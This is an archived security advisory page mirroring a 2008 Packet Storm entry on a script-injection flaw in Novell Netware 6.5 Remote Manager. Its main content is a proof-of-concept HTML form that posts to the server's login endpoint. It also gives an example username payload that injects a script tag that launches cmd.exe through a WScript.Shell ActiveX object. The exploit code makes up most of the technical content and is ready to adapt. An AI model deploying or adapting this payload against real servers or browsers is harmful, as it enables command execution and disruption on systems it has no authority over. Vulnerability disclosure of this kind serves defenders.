Lucene search

K

netbeware.txt

🗓️ 22 Aug 2008 00:00:00Reported by Jeremy BrownType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Novell Netware 6.5's Remote Manager vulnerability to session-wise script injection via the client browser. Impact includes interruption of server operations until session is cleared or another browser is used

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<!--- Jeremy Brown ([email protected])  
Novell Netware 6.5's Remote Manager is vulnerable to script injection, session-wise,  
via the client browser. A specially crafted POST command to the server will inject  
data in the client's current session. Server will not resume normal operations  
via the client until session is cleared or another browser is used (IE vs. FF). --->  
  
<html>  
<FORM method=POST action="https://192.168.1.201:8009/_LOGIN_SERVER2_"  
name="authenticator">  
<center>Novell Netware 6.5 Remote Manager HTML Injection Exploit</center>  
<br><br>  
Username: <input type="text" name="usr"><br>  
Password: <input type="text" name="pwd"><br><br>  
<input type="submit" name="login" value="LOGIN">  
<br><br><center>Example --> Username: "><script>var ex=new ActiveXObject("WScript.Shell");ex.run('cmd.exe /C ver');</script></center>  
</html>`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo